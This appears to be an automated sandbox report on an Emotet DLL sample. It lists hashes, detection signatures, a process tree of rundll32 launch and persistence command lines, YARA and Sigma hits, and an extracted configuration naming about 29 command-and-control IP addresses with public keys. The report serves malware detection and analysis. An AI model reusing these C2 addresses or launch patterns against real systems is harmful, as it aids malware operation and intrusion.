Play interactive tour

Edit tour

Windows Analysis Report TYLNb8VvnmYA.dll

Overview

General Information

Sample Name:	TYLNb8VvnmYA.dll
Analysis ID:	532264
MD5:	2b155f0eb4240dbe18024ca82e2418ca
SHA1:	a84ba84de27be3294350f7428de56355b4417a79
SHA256:	60b8988a2c2fc3f2108ab8cb49d8a7a566f5bcd2036dca941c5863f9085c3a9d
Infos:
Most interesting Screenshot:

Detection

Emotet

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Emotet

Sigma detected: Emotet RunDLL32 Process Creation

Changes security center settings (notifications, updates, antivirus, firewall)

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses 32bit PE files

One or more processes crash

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Deletes files inside the Windows folder

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Abnormal high CPU Usage

AV process strings found (often used to terminate AV products)

Tries to load missing DLLs

Contains functionality to read the PEB

Drops PE files to the windows directory (C:\Windows)

Checks if the current process is being debugged

Connects to several IPs in different countries

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 5808 cmdline: loaddll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 4608 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 4532 cmdline: rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6668 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4540 cmdline: rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 1840 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gipupxhph\siawepkk.qzv",iJIySwmeuqOefH MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 4492 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gipupxhph\siawepkk.qzv",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6520 cmdline: rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,axamexdrqyrgb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6624 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6516 cmdline: rundll32.exe C:\Users\user\Desktop\TYLNb8VvnmYA.dll,bhramccfbdd MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5208 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\TYLNb8VvnmYA.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

WerFault.exe (PID: 7128 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 304 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5772 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5808 -s 324 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 4524 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6492 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 6916 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

SgrmBroker.exe (PID: 2944 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)

svchost.exe (PID: 5376 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)

MpCmdRun.exe (PID: 3472 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)

conhost.exe (PID: 2532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

svchost.exe (PID: 6116 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)

WerFault.exe (PID: 6424 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5808 -ip 5808 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 3644 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5808 -ip 5808 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

svchost.exe (PID: 5096 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5012 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

svchost.exe (PID: 5180 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)

cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.540649559.00000000010F0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.557294263.0000000001110000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.582540666.0000000000A5C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000002.546594533.0000000000A10000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.659478506.0000000000BC0000.00000040.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.558410733.0000000000A5C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.558256416.00000000009E0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.581726309.0000000000A5C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.582467938.00000000009E0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.659377295.000000000061A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.601059851.00000000009E0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000004.00000003.528291798.0000000000C69000.00000004.00000001.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000002.601107965.0000000000A5C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000008.00000002.557479491.000000000328A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.556361000.0000000000C4A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.559892277.0000000000A5C000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000007.00000002.556237004.0000000000B10000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.581678982.00000000009E0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000000.00000000.559720602.00000000009E0000.00000040.00000010.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
00000005.00000002.540803207.000000000325A000.00000004.00000020.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author
7.2.rundll32.exe.c620f8.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.b10000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.632468.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.9e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a63b78.4.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.9e0000.3.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.a63b78.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1110000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.a10000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.1110000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.9e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
4.2.rundll32.exe.a10000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a63b78.7.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.632468.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.a63b78.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.9e0000.6.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a63b78.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.32a4168.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.c620f8.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a63b78.7.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.9e0000.6.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.9e0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
7.2.rundll32.exe.b10000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a63b78.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a63b78.4.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.9e0000.9.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
8.2.rundll32.exe.32a4168.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.bc0000.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.2.loaddll32.exe.9e0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.10f0000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.3273688.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.10f0000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.rundll32.exe.bc0000.1.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.9e0000.3.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a63b78.10.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
5.2.rundll32.exe.3273688.1.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.9e0000.9.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0.0.loaddll32.exe.a63b78.10.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
Click to see the 33 entries

Sigma Overview

System Summary:

Sigma detected: Emotet RunDLL32 Process Creation

Show sources

Source: Process started

Author: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gipupxhph\siawepkk.qzv",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gipupxhph\siawepkk.qzv",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gipupxhph\siawepkk.qzv",iJIySwmeuqOefH, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 1840, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Gipupxhph\siawepkk.qzv",Control_RunDLL, ProcessId: 4492

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.0.loaddll32.exe.9e0000.6.unpack

Malware Configuration Extractor: Emotet {"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Multi AV Scanner detection for submitted file

Show sources

Source: TYLNb8VvnmYA.dll

Virustotal: Detection: 25%

Perma Link

Source: TYLNb8VvnmYA.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: TYLNb8VvnmYA.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.564262336.0000000002CDC000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.564338368.0000000002CA9000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.564358097.0000000002CA9000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.564338368.0000000002CA9000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.564358097.0000000002CA9000.00000004.00000001.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.564520249.0000000002C9D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.564326548.0000000002C9D000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.585713559.000000000320C000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.586254473.000000000320C000.00000004.00000001.sdmp
Source:	Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbk source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.566851416.0000000004E91000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.590940435.00000000050B1000.00000004.00000001.sdmp
Source:	Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000016.00000002.578653087.00000000005E2000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.564520249.0000000002C9D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.564326548.0000000002C9D000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.585713559.000000000320C000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000003.586254473.000000000320C000.00000004.00000001.sdmp

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6ECE2FE7 FindFirstFileExW,		0_2_6ECE2FE7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6ECE2FE7 FindFirstFileExW,		4_2_6ECE2FE7

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 46.55.222.11:443
Source: Malware configuration extractor	IPs: 104.245.52.73:8080
Source: Malware configuration extractor	IPs: 41.76.108.46:8080
Source: Malware configuration extractor	IPs: 103.8.26.103:8080
Source: Malware configuration extractor	IPs: 185.184.25.237:8080
Source: Malware configuration extractor	IPs: 103.8.26.102:8080
Source: Malware configuration extractor	IPs: 203.114.109.124:443
Source: Malware configuration extractor	IPs: 45.118.115.99:8080
Source: Malware configuration extractor	IPs: 178.79.147.66:8080
Source: Malware configuration extractor	IPs: 58.227.42.236:80
Source: Malware configuration extractor	IPs: 45.118.135.203:7080
Source: Malware configuration extractor	IPs: 103.75.201.2:443
Source: Malware configuration extractor	IPs: 195.154.133.20:443
Source: Malware configuration extractor	IPs: 45.142.114.231:8080
Source: Malware configuration extractor	IPs: 212.237.5.209:443
Source: Malware configuration extractor	IPs: 207.38.84.195:8080
Source: Malware configuration extractor	IPs: 104.251.214.46:8080
Source: Malware configuration extractor	IPs: 212.237.17.99:8080
Source: Malware configuration extractor	IPs: 212.237.56.116:7080
Source: Malware configuration extractor	IPs: 216.158.226.206:443
Source: Malware configuration extractor	IPs: 110.232.117.186:8080
Source: Malware configuration extractor	IPs: 158.69.222.101:443
Source: Malware configuration extractor	IPs: 107.182.225.142:8080
Source: Malware configuration extractor	IPs: 176.104.106.96:8080
Source: Malware configuration extractor	IPs: 81.0.236.90:443
Source: Malware configuration extractor	IPs: 50.116.54.215:443
Source: Malware configuration extractor	IPs: 138.185.72.26:8080
Source: Malware configuration extractor	IPs: 51.68.175.8:8080
Source: Malware configuration extractor	IPs: 210.57.217.132:8080

Source: Joe Sandbox View	ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: Joe Sandbox View	ASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU

Source: Joe Sandbox View	IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View	IP Address: 212.237.17.99 212.237.17.99

Source: unknown

Network traffic detected: IP country count 18

Source: WerFault.exe, 00000019.00000003.599154810.0000000004D72000.00000004.00000001.sdmp, WerFault.exe, 00000019.00000002.600553614.0000000004D72000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: WerFault.exe, 00000019.00000002.600418522.0000000003158000.00000004.00000020.sdmp	String found in binary or memory: http://crl.microsoft
Source: Amcache.hve.22.dr	String found in binary or memory: http://upx.sf.net
Source: svchost.exe, 00000009.00000002.398712161.000001424C613000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000002.00000002.679231655.0000018D2F245000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000002.00000002.679231655.0000018D2F245000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000002.00000002.679231655.0000018D2F245000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 00000002.00000002.679102531.0000018D2F22A000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000002.00000002.679102531.0000018D2F22A000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000009.00000003.369044474.000001424C65D000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000009.00000002.413717159.000001424C66A000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369025048.000001424C668000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.369069267.000001424C642000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369057963.000001424C641000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.409097273.000001424C64C000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369083115.000001424C645000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 00000009.00000002.412108697.000001424C660000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369041405.000001424C65F000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369057963.000001424C641000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000009.00000003.369044474.000001424C65D000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 00000009.00000003.369049789.000001424C658000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.411168359.000001424C659000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 00000009.00000003.369083115.000001424C645000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 00000009.00000003.369038841.000001424C662000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 00000009.00000002.403271535.000001424C629000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 00000009.00000003.334621644.000001424C634000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.369075670.000001424C63D000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
